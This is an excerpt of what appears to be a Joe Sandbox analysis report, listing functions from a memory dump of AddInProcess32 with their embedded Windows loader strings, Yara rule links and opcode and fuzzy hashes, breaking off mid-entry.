Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01514519
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01514508
LdrpCheckRedirection, xrefs: 0151450F

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 241e25bae2afc26dd1e8f48932b46db76f29a105c21a9a18c991b3370db4b919
Instruction ID: 8885d700030e2b821e5e6fd9f8572a835778c25aa43418aceb20a74430867021
Opcode Fuzzy Hash: 241e25bae2afc26dd1e8f48932b46db76f29a105c21a9a18c991b3370db4b919
Instruction Fuzzy Hash: AA41E6726443119FEB23DF5CD84092A7BE4BF88750F0A1A69ED59DF259D7B0D800CB91

Function 014C32C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

Actx , xrefs: 014C32CC
RtlCreateActivationContext, xrefs: 01502803
SXS: %s() passed the empty activation context data, xrefs: 01502808

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: bafc7a5fdc5568ff5cc02c96cc3e996191e011cb476a58df45e45cf0bbaab8cb
Instruction ID: 1821f72d17eed92c9d17a4d79924430e4380fca40765bd9ba432b9cc481c6737
Opcode Fuzzy Hash: bafc7a5fdc5568ff5cc02c96cc3e996191e011cb476a58df45e45cf0bbaab8cb
Instruction Fuzzy Hash: 6F3112366003069BEB12CE58D884B9A7BA4BF54B14F11846EFD059F3A1CB70E906CBD0

Function 0151B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 0151B2F0
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0151B2B2
GlobalFlag, xrefs: 0151B30F

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 2252ea43c90e4aec117d21bb3c0e423285117d109bc9341b895273ae3b182913
Instruction ID: 6cc709ea7f9f0f360b23d21aec2be488ecf3526e27245497724203fda7da7d24
Opcode Fuzzy Hash: 2252ea43c90e4aec117d21bb3c0e423285117d109bc9341b895273ae3b182913
Instruction Fuzzy Hash: 91313E71A00209AFEB11EF95CC90EEEBBBCFF54744F54046EEA01AB255D7749E048BA0

Function 014C1527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

DLL "%wZ" has TLS information at %p, xrefs: 0150184A
LdrpInitializeTls, xrefs: 01501851
minkernel\ntdll\ldrtls.c, xrefs: 0150185B

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: fe5de4714672b47607053e67a5bfb5a65fbd1796905a6d26c9e79e2e56fa4f6e
Instruction ID: 361713ecabe9adb9d51d60e02c9bccfb2b3adec4042260e14b21eb42b5b9c060
Opcode Fuzzy Hash: fe5de4714672b47607053e67a5bfb5a65fbd1796905a6d26c9e79e2e56fa4f6e
Instruction Fuzzy Hash: 7E312B75A20201EBE7619F99CC85F6E76A8FF60F44F06051EE502BB2A1E770EE059790

Function 014D1190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

BuildLabEx, xrefs: 014D122F
@, xrefs: 014D11C5
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 014D119B

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction ID: ec4a1cf476acf66d275404f1d22f73412d57b91356861d2749fb6178e6f6882e
Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction Fuzzy Hash: FA3184B290021ABBDF12DB95CC54EAFBB7DEB64654F00402AFA15A7270D771D9058B90

Function 014A51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 014A54C3
@, xrefs: 014A5365

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: da5a9b0f03117066898e47ffdb3854a9f9ac068f636b912fd519efd5e983f35e
Instruction ID: b6c05616bfbbd286b4c5092b21ff130629dcfe90f6a9fdc87da0319526777351
Opcode Fuzzy Hash: da5a9b0f03117066898e47ffdb3854a9f9ac068f636b912fd519efd5e983f35e
Instruction Fuzzy Hash: CC328A705083518BD7248F19C680B3FBBE1AFA9704F96492FFA959B3A0E734D845CB52

Function 0150E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0150E3D1
Legacy, xrefs: 0150E3DA

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: c47ae14aaa0a868c5ef43dee004b6ad2583e11e05a9afa0d4f392be62a77d5a8
Instruction ID: 9acd51b978fff3741d6e029dd3a2d85ae176bd382e947fb45760741eb5b95154
Opcode Fuzzy Hash: c47ae14aaa0a868c5ef43dee004b6ad2583e11e05a9afa0d4f392be62a77d5a8
Instruction Fuzzy Hash: 68617171A002099FDB16DFA9C851BADBBF8FF54700F24486EE649EB291E731E901CB50

Function 0156B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

RedirectedKey, xrefs: 0156B60E
\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 0156B5C4

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: 14ef6f9d98891c0895e17c5afcfa3b8c2c9768b890bccae139222f910ed730e5
Instruction ID: 0c52549841fecb799bb83dd4cb272f03a2605d1d9b5e5360fc1db1573be7d4bb
Opcode Fuzzy Hash: 14ef6f9d98891c0895e17c5afcfa3b8c2c9768b890bccae139222f910ed730e5
Instruction Fuzzy Hash: B36115B1D00219EBDF21DFD5C888ADEBFB8FB08715F14402AE505EB254E7749A85CBA1

Function 01490485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01490586
kLsE, xrefs: 014905FE

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 35422903fbc512a74f662c84b8e49cb1d81d21a089dda7911430c3ca99cbbfff
Instruction ID: 222cff5a11c6b5576aef724ea1219fae58d70b1f40a030a2413628a349b9c0ab
Opcode Fuzzy Hash: 35422903fbc512a74f662c84b8e49cb1d81d21a089dda7911430c3ca99cbbfff
Instruction Fuzzy Hash: 6D51CF71A00746DFDF24DFA9C4446ABBBF8AF54314F10843FE69A97261E730A905CBA1

Function 0149A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0149A229
RtlpResUltimateFallbackInfo Enter, xrefs: 0149A21B

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 1dff335f7eb894c983cee3580e3709448d418a14984e4a401511920c895c3037
Instruction ID: 1f966823f0ba1c498f525781cc6c62abb1e42258e47580aaec1bd2ad447b6279
Opcode Fuzzy Hash: 1dff335f7eb894c983cee3580e3709448d418a14984e4a401511920c895c3037
Instruction Fuzzy Hash: 4441A935A006559BEB12CF9AC840F6ABBB4FF95744F2440AAEA00DF3B1E676D901CB11

Function 0152314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 0152317C
LdrResGetRCConfig Exit, xrefs: 0152318E

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: a7790459d144ec5be3bdbdb9aad651022e67e052de8bde548ab97a12f39c287c
Instruction ID: c03b36c5090368588d1179b90285b405a42a795268c00df070fb35e86269f68e
Opcode Fuzzy Hash: a7790459d144ec5be3bdbdb9aad651022e67e052de8bde548ab97a12f39c287c
Instruction Fuzzy Hash: 2C31E1322087519BE315DF69D844B1ABBE4FF9A714F14086AF9548F3D0EB34D905CB52

Function 014C31BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 014C31D5
@, xrefs: 014C322D

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 8e767490197732f910ec2b92b9f6194906c7716d4f6ef9b5836276e9c7b32b96
Instruction ID: b6a921022f30e3b00ed9a9eb9d75764f917f48d88c4d5ce2b40bd055f25508ae
Opcode Fuzzy Hash: 8e767490197732f910ec2b92b9f6194906c7716d4f6ef9b5836276e9c7b32b96
Instruction Fuzzy Hash: 8E31B376508301AFCB61DF28C880A5BFBE9FB95A54F00492FF99583260D630DD05CB92

Function 014C33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 0150289A
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0150289F

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 193796bd89351a25d2ab4f99d16d273eb9c63e8962a6cacc7d6b0ebd2865bb58
Instruction ID: de400f66ebc72128e064a1516f123354c982b5d3e2ac46f1d52ac7a9bc636a1c
Opcode Fuzzy Hash: 193796bd89351a25d2ab4f99d16d273eb9c63e8962a6cacc7d6b0ebd2865bb58
Instruction Fuzzy Hash: ED110A7AB00215ABF7168E898D45F5B7AA9EB94B10F14C03EBA049B294D674CD0146A4

Function 014CA4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 014CA504
Threadpool!, xrefs: 014CA509

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: cd97569d57b2cf917a42f9d01b0833f5ae83c1d2caa51687e39d600afe29b2da
Instruction ID: 119e058b16ea6bd3b5cfe6b98248ad393ee002ca308a18154f16a2cd6c8475a9
Opcode Fuzzy Hash: cd97569d57b2cf917a42f9d01b0833f5ae83c1d2caa51687e39d600afe29b2da
Instruction Fuzzy Hash: F60121B2140744AFD321DF14CD05B2677E8EB60B59F04893EE618CB6A0E330D904CB46

Function 014CA580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 015065D4

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 8f21036ffcf3c4c024fbc862625bd2cb0fa2eee5d3e032047467160f20ddd52e
Instruction ID: e8c367bc37be2dc4c4fd40f1f2585352dc4b94aa23d03ee9a0febcf7a64408b1
Opcode Fuzzy Hash: 8f21036ffcf3c4c024fbc862625bd2cb0fa2eee5d3e032047467160f20ddd52e
Instruction Fuzzy Hash: 73718E75E0020A9FDF26CF9CD9806ADBBF2BF58710F14852EE905AB285E7318951CB50

Function 014A02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#%u, xrefs: 014F4B8F

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: #%u
API String ID: 0-232158463
Opcode ID: 2c85f4412e26b6402e01a6bbb804359fa025b12c9c87fbff284bcbd218a0146d
Instruction ID: 496b11bb266b8921e9a7425f8d1fc90c80454e944aae7ff99c746c7313c3bf23
Opcode Fuzzy Hash: 2c85f4412e26b6402e01a6bbb804359fa025b12c9c87fbff284bcbd218a0146d
Instruction Fuzzy Hash: 7D714E71A0010A9FDB15DF99C994BAFB7F8FF28704F19406AE901E7361EA34E945CB60

Function 0151F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 0151F4E7

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction ID: 769b5c3a7828c0f7cd89429c678db48b55fef1f38f7f2d20c828d46d6ec7dd03
Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction Fuzzy Hash: AE51A072504742AFE7229F59C840F6BB7E8FBA4714F01092EF6419B2A4D7B4ED08CB91

Function 014AE547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 014AE5C4

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: a237238146babfcca29d0b713b06f76473f31f8f00c44df2d44b9f054ac66a82
Instruction ID: 32950d71825cff789f9c45fb281a7b320bef9228b05acb3b7553e817b2e8ba3f
Opcode Fuzzy Hash: a237238146babfcca29d0b713b06f76473f31f8f00c44df2d44b9f054ac66a82
Instruction Fuzzy Hash: 0541C4715143029BD710DE65C944B6BB7E8AFA8704FC60D2FF698E72A0E674D9048792

Function 014C41BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 014C4220

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction ID: a9493d276a5dba59bdd740af4dc943e6e9dbfcbd59e089440a7da9ec08947afe
Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction Fuzzy Hash: F651AE711007119FD321CF59C851A6BBBF9FF58B10F00892EFA95976A0E7B4E904CBA1

Function 0150C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0150C3FF

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 041b17a9a71a38a9c30df75985a00f089c6df2387eee538e6035da8e56067f8a
Instruction ID: 75795b8e9f4dfd103e5da7fd17a1be69363ab0956d9320d7dded5f21d8e1812c
Opcode Fuzzy Hash: 041b17a9a71a38a9c30df75985a00f089c6df2387eee538e6035da8e56067f8a
Instruction Fuzzy Hash: 014187B190012D9BDF21DA90CC90FDEB77CBB55714F0145EAE708AB190DB709E888FA4

Function 01519429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 015194F0

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 1a7b753e56f1ed7c0c82b35f2d05b3a37fd30369311a61a358e5eca06ff40248
Instruction ID: 71fa64dce0a3355a23180b26544fd62fa1a912a2067120b2478e02291e0661bb
Opcode Fuzzy Hash: 1a7b753e56f1ed7c0c82b35f2d05b3a37fd30369311a61a358e5eca06ff40248
Instruction Fuzzy Hash: 293107757102019FFB328F1C9860B3A77E5FB98718F55842AE609EF285FA718C818790

Function 014C7425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 0150442D

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction ID: 24f0803f4e56442235e91e824be5e47a65a12a8441d7060b7c812687842c6bac
Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction Fuzzy Hash: F241BF79A00516ABCF62DF88C490BBEBBB4FF50B02F01806FE9519B261D7309942CB91

Function 015185AA Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015185DE

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: fe39acb5d48fd89000b1f5b58d31647d49a7ad0c160397ac1069f0c7042bb5ac
Instruction ID: 1f8e0ca9ff2582b7ff3a6a77fb289275e403e5cd5acfcc601fc943c5683d3f3b
Opcode Fuzzy Hash: fe39acb5d48fd89000b1f5b58d31647d49a7ad0c160397ac1069f0c7042bb5ac
Instruction Fuzzy Hash: 6F012B313002019BFB377A169844A6E7FA6FFB0664F04185DF5032F56ACF206884CB94

Function 014E717A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ff379800cb45d07c6a2d1db37baf44260f0cf4298b947efcbe22d3024f2bdd
Instruction ID: 31fa12757dd7071fc12e662ed2c9a100b7651254b46872f4e5397e4d7571a293
Opcode Fuzzy Hash: 08ff379800cb45d07c6a2d1db37baf44260f0cf4298b947efcbe22d3024f2bdd
Instruction Fuzzy Hash: 1B42C371A002168FDB19CF59C4945AEB7F2FF88326B14856EE952AB361D734EC42CBD0

Function 014BB1E0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 472ec7625159004d4db396c2f75e2aee9f411d5cdb9bead32a51fc36f5675444
Instruction ID: eb87cd7035ce2774876d5dfc3e1bd3fac7ad2de79ed0a76fd6b2975e128abfd3
Opcode Fuzzy Hash: 472ec7625159004d4db396c2f75e2aee9f411d5cdb9bead32a51fc36f5675444
Instruction Fuzzy Hash: B9326D75E01219DBCF14DFA9D894AEEBBB1FF54704F19002EE905AB3A0E7359901CBA1

Function 014A2760 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d589ff5f231e27f776d92187c00ff90c555b8853592f3116c2c8af408d593c2
Instruction ID: 41a6ac728e24226b647cae9dbc94e0a6b804fc6aa7ea63e855594ddd8dafd374
Opcode Fuzzy Hash: 5d589ff5f231e27f776d92187c00ff90c555b8853592f3116c2c8af408d593c2
Instruction Fuzzy Hash: 4D32E170A007558FEB24DF69C854BBEBBF2BF94704F16412EE6469B3A5D734A802CB50

Function 0155124C Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d97ee889aa95fedf1329292494d33b327a6a1f4c663d2d389bdc923e4d6e84
Instruction ID: f824f85b4eb17919d1eb004ce1e17c442ccb40479e0ad6c23373b751e6400c80
Opcode Fuzzy Hash: a3d97ee889aa95fedf1329292494d33b327a6a1f4c663d2d389bdc923e4d6e84
Instruction Fuzzy Hash: FB228E35A006168FDB59CF59C4E0BAEBBF2BF88304B18856ED956DF345DB30A941CB90

Function 014964F0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1acf354a5c36227ee8f4bcbea1217f97cfad60ac232ff9134650665288588428
Instruction ID: a3aa9a9f5e7ed25ac5b3ae71c1f4f23fed45edd79ae932431ae0947cee771ff1
Opcode Fuzzy Hash: 1acf354a5c36227ee8f4bcbea1217f97cfad60ac232ff9134650665288588428
Instruction Fuzzy Hash: 04E15D715093428FCB15CF28C090A6BBBE1FF99314F06896EE5998B361DB71E906CB91

Function 01488347 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b47528d90df30d61c52d8324cc34255229796fe34df13b61f14dc1d5024363c
Instruction ID: 66a4f362220527616ee4fade910e5aeb2ec1708906876372bbc9b25a1d9d7b6c
Opcode Fuzzy Hash: 1b47528d90df30d61c52d8324cc34255229796fe34df13b61f14dc1d5024363c
Instruction Fuzzy Hash: 73D1BF71A002079BDB14EF69C881ABF77B5FF64604F84412FE916DB2A1EB34E946CB50

Function 0149D700 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cd9afd62588ae7e8a7a2a09057f4a2c7bdb2ef40dcc79dc03ab463e1a45d178
Instruction ID: e4f914c9d973b401f3014d87be138d676483822bfa8f003ad2cce9e564641638
Opcode Fuzzy Hash: 1cd9afd62588ae7e8a7a2a09057f4a2c7bdb2ef40dcc79dc03ab463e1a45d178
Instruction Fuzzy Hash: 76C1B671E002169BDF24DF5DC850BAEBBB2BF44314F14825EEA55AB3A1D770E941CB90

Function 014D1763 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2173c131b8bb12d655340dfc552adea73de8756c874573f7568a5d3c3acd0d53
Instruction ID: 35d16424185f2d1ebf45fb76a96d2d454734bd0acfb911dd240fb70c31d7d6c5
Opcode Fuzzy Hash: 2173c131b8bb12d655340dfc552adea73de8756c874573f7568a5d3c3acd0d53
Instruction Fuzzy Hash: E6D11571A00605DFDB51DFA9C990B9A7BE9BF18704F0440BAED09DF26AE731D905CBA0

Function 014AF380 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87eb5b317b9303a4c4b403d348e5578a64cb46679b0aacd623417b7a902d0c10
Instruction ID: 425bb19f4bc1a8dc091139d8465074ef5bfaf3c36147f22a1d18fcff26d948e5
Opcode Fuzzy Hash: 87eb5b317b9303a4c4b403d348e5578a64cb46679b0aacd623417b7a902d0c10
Instruction Fuzzy Hash: 4BC1F471A002218BDB24CF1DC4947BE7BE1FB68704F9A416BD9829F3A6E7349945C760

Function 014937E4 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
